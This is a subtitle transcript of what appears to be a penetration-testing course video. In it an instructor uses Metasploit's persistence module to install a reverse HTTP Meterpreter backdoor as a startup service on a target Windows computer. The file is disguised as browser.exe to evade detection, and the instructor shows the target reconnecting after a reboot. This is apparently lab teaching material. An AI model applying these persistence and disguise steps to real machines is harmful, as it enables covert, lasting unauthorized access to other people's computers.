1
00:00:00,350 --> 00:00:01,350
<v Instructor>So what we're going to do</v>

2
00:00:01,350 --> 00:00:04,220
is we're going to use our backdoor,

3
00:00:04,220 --> 00:00:07,180
the normal HTTP reverse Meterpreter backdoor

4
00:00:07,180 --> 00:00:09,440
that we created in the first video

5
00:00:09,440 --> 00:00:11,550
when we created an undetectable backdoor.

6
00:00:11,550 --> 00:00:14,670
We're gonna use that and inject that as a service

7
00:00:14,670 --> 00:00:16,610
so that it runs every time

8
00:00:16,610 --> 00:00:18,490
the target person runs their computer

9
00:00:18,490 --> 00:00:20,300
and tries to connect back to us

10
00:00:20,300 --> 00:00:22,730
every certain amount of time.

11
00:00:22,730 --> 00:00:25,360
So to do this, first of all,

12
00:00:25,360 --> 00:00:28,580
I'm just going to Control + C this

13
00:00:28,580 --> 00:00:30,850
and then I'm going to background the current session.

14
00:00:30,850 --> 00:00:32,290
So we've seen that before.

15
00:00:32,290 --> 00:00:35,230
You can do background and I can still interact

16
00:00:35,230 --> 00:00:37,780
with that session on number one

17
00:00:37,780 --> 00:00:39,873
and I'm going to use a module.

18
00:00:41,290 --> 00:00:43,130
So this is like the multi/handler module

19
00:00:43,130 --> 00:00:44,760
that comes with Metasploit

20
00:00:44,760 --> 00:00:49,760
and it's called exploit/windows/local/persistence.

21
00:00:53,450 --> 00:00:54,640
Then I'm gonna show its options

22
00:00:54,640 --> 00:00:56,290
to see what we need to configure.

23
00:00:58,470 --> 00:00:59,670
So you can see here,

24
00:00:59,670 --> 00:01:01,490
we have similar options to what we've seen

25
00:01:01,490 --> 00:01:03,387
with the Metasploit service.

26
00:01:03,387 --> 00:01:06,040
So the first thing is the amount of seconds

27
00:01:06,040 --> 00:01:09,890
that the target will try to connect back to us.

28
00:01:09,890 --> 00:01:13,436
So the interval, and I'm gonna keep that to 10 seconds

29
00:01:13,436 --> 00:01:14,980
so every 10 seconds, the target computer

30
00:01:14,980 --> 00:01:17,320
will try to connect back to me.

31
00:01:17,320 --> 00:01:19,120
Now the EXE_NAME is the name

32
00:01:19,120 --> 00:01:21,300
that'll show up under the processes

33
00:01:21,300 --> 00:01:24,290
where the connection's coming back from.

34
00:01:24,290 --> 00:01:27,240
So I'm gonna set that to browser

35
00:01:27,240 --> 00:01:29,850
to make it less detectable.

36
00:01:29,850 --> 00:01:32,320
So we're gonna set the EXE_NAME

37
00:01:32,320 --> 00:01:37,070
to browser.exe

38
00:01:39,840 --> 00:01:43,260
and then the path where the payload

39
00:01:43,260 --> 00:01:44,660
or the backdoor will be installed,

40
00:01:44,660 --> 00:01:46,320
I'll leave that the same.

41
00:01:46,320 --> 00:01:49,370
I'll leave the REG_NAME, the registry entry, the same.

42
00:01:49,370 --> 00:01:50,760
Now this is very important.

43
00:01:50,760 --> 00:01:53,390
You need to specify which session

44
00:01:53,390 --> 00:01:55,230
to run this exploit on.

45
00:01:55,230 --> 00:01:56,530
And as you can see now,

46
00:01:56,530 --> 00:01:59,880
we were using session number one,

47
00:01:59,880 --> 00:02:01,920
that's our Meterpreter session

48
00:02:01,920 --> 00:02:05,060
and if I do sessions -l,

49
00:02:05,060 --> 00:02:06,810
it'll list all the available sessions

50
00:02:06,810 --> 00:02:09,810
and we can see that it's ID number one.

51
00:02:09,810 --> 00:02:13,470
So what we need to do is we need to set our session here

52
00:02:13,470 --> 00:02:15,420
to number one.

53
00:02:15,420 --> 00:02:16,980
So I'm gonna do set

54
00:02:19,500 --> 00:02:21,623
SESSION to one.

55
00:02:23,880 --> 00:02:25,990
Okay, and the startup, we're gonna leave it

56
00:02:25,990 --> 00:02:27,620
for the user person,

57
00:02:27,620 --> 00:02:29,750
for the user privileges.

58
00:02:29,750 --> 00:02:31,223
Now, let's show the options.

59
00:02:36,150 --> 00:02:38,680
So browser, and the session number one.

60
00:02:38,680 --> 00:02:39,760
That's all good.

61
00:02:39,760 --> 00:02:41,320
Now, we need to do one thing

62
00:02:41,320 --> 00:02:42,970
which is the most important thing,

63
00:02:43,860 --> 00:02:46,890
is to specify the payload that will be injected

64
00:02:46,890 --> 00:02:48,300
as a service.

65
00:02:48,300 --> 00:02:49,600
So to do that,

66
00:02:49,600 --> 00:02:53,900
we're going to do a show advanced

67
00:02:56,150 --> 00:02:57,500
and we haven't seen this before,

68
00:02:57,500 --> 00:03:00,200
so every module has advanced options

69
00:03:00,200 --> 00:03:02,160
that we didn't have a look at before.

70
00:03:02,160 --> 00:03:04,560
So show advanced will show you advanced options

71
00:03:04,560 --> 00:03:07,980
that you can set up for this particular module.

72
00:03:07,980 --> 00:03:08,990
So when I run this,

73
00:03:08,990 --> 00:03:11,450
you'll see I'll get so many more options

74
00:03:11,450 --> 00:03:13,890
and the one that we're interested in is this one,

75
00:03:13,890 --> 00:03:16,660
so it's called EXE::Custom

76
00:03:16,660 --> 00:03:19,520
which means that we're going to use a custom EXE

77
00:03:19,520 --> 00:03:22,800
to run and inject into the target computer

78
00:03:22,800 --> 00:03:23,853
as a service.

79
00:03:24,700 --> 00:03:27,730
So I'm gonna set my EXE::Custom

80
00:03:37,852 --> 00:03:42,852
to /var/www/html/backdoor.exe.

81
00:03:44,712 --> 00:03:48,110
As you remember, I had that running on backdoor,

82
00:03:48,110 --> 00:03:53,110
I had that stored in /var/www/html/backdoor.exe

83
00:03:53,650 --> 00:03:55,370
so I'm gonna hit Enter

84
00:03:55,370 --> 00:03:57,640
and I'm just gonna do show advanced again

85
00:03:57,640 --> 00:03:59,960
to make sure that it was set up properly

86
00:04:01,950 --> 00:04:03,940
'cause sometimes I misspell things

87
00:04:03,940 --> 00:04:06,970
and it's /var/www/html/backdoor.exe.

88
00:04:06,970 --> 00:04:08,090
So that's perfect.

89
00:04:08,090 --> 00:04:09,630
Everything is good to go.

90
00:04:09,630 --> 00:04:11,013
I'm gonna exploit this.

91
00:04:15,610 --> 00:04:20,380
And that will upload /var/www/html/backdoor.exe

92
00:04:20,380 --> 00:04:23,960
on the target computer using the session that we specified,

93
00:04:23,960 --> 00:04:24,793
session number one.

94
00:04:24,793 --> 00:04:26,740
As you can see now, it's been uploaded

95
00:04:26,740 --> 00:04:29,920
and installed, and one important thing

96
00:04:29,920 --> 00:04:32,770
that you need to keep in mind is this resource file

97
00:04:32,770 --> 00:04:34,740
'cause you can use this to clean up

98
00:04:34,740 --> 00:04:36,590
and delete the backdoor once you're done,

99
00:04:36,590 --> 00:04:38,410
so if you don't want the backdoor anymore

100
00:04:38,410 --> 00:04:39,820
on the target computer,

101
00:04:39,820 --> 00:04:42,910
you can use this file to delete that backdoor,

102
00:04:42,910 --> 00:04:45,520
so I'm gonna store that in a Leafpad here

103
00:04:45,520 --> 00:04:49,960
so that I can run it and delete my backdoor if I wanted

104
00:04:49,960 --> 00:04:51,833
to delete it anytime in the future.

105
00:04:53,120 --> 00:04:55,363
If I do sessions -l,

106
00:04:56,800 --> 00:04:58,570
I still have my session here

107
00:04:58,570 --> 00:05:00,393
and I can interact with it.

108
00:05:04,850 --> 00:05:05,820
So what I'm going to do

109
00:05:05,820 --> 00:05:07,460
is I'm actually gonna kill that session.

110
00:05:07,460 --> 00:05:09,010
I'm gonna kill all my sessions.

111
00:05:14,680 --> 00:05:16,850
And now if I list, I have no connections

112
00:05:16,850 --> 00:05:19,090
with the target computer, as you can see,

113
00:05:19,090 --> 00:05:24,090
and I'm going to go use my exploit/multi/handler,

114
00:05:24,800 --> 00:05:26,800
so I can listen for incoming connections

115
00:05:33,700 --> 00:05:36,240
and everything is configured correctly already on this.

116
00:05:36,240 --> 00:05:38,530
So I have my right port and my right IP.

117
00:05:38,530 --> 00:05:40,020
Now, if I exploit this

118
00:05:40,020 --> 00:05:42,460
right now, I'll get a connection straightaway

119
00:05:42,460 --> 00:05:45,150
because my backdoor has been injected

120
00:05:45,150 --> 00:05:47,980
into the target computer on port 8080

121
00:05:47,980 --> 00:05:51,000
on reverse HTTP, but I'm not gonna do that now,

122
00:05:51,000 --> 00:05:53,090
I'm actually gonna restart the target computer

123
00:05:53,090 --> 00:05:56,000
just to show you that I'll always have a connection now

124
00:05:56,000 --> 00:05:57,430
with this computer.

125
00:05:57,430 --> 00:05:59,343
So I'm just gonna do a normal restart.

126
00:06:04,839 --> 00:06:07,090
So this computer will basically try to connect back

127
00:06:07,090 --> 00:06:08,793
to me every 10 seconds.

128
00:06:10,330 --> 00:06:12,130
No matter how many times they restart it,

129
00:06:12,130 --> 00:06:15,360
they shut it down, every time this computer is running,

130
00:06:15,360 --> 00:06:17,130
it'll try to connect back to me

131
00:06:17,130 --> 00:06:18,570
every 10 seconds.

132
00:06:18,570 --> 00:06:22,150
So all I have to do is run my Meterpreter handler

133
00:06:22,150 --> 00:06:24,020
and wait for connections.

134
00:06:24,020 --> 00:06:25,790
Now, this connection's running as you can see.

135
00:06:25,790 --> 00:06:27,300
It doesn't have to be at the startup

136
00:06:27,300 --> 00:06:28,550
when I'm listening

137
00:06:28,550 --> 00:06:31,053
and I'm just gonna do exploit to listen.

138
00:06:33,260 --> 00:06:35,250
And it will take a maximum of 10 seconds

139
00:06:35,250 --> 00:06:36,250
to get a connection back

140
00:06:36,250 --> 00:06:38,100
and as you can see, I got a connection

141
00:06:38,100 --> 00:06:39,540
to the target computer,

142
00:06:39,540 --> 00:06:42,030
I can do sysinfo and run all the commands

143
00:06:42,030 --> 00:06:43,220
that we learned so far

144
00:06:43,220 --> 00:06:45,603
and have full access on that computer.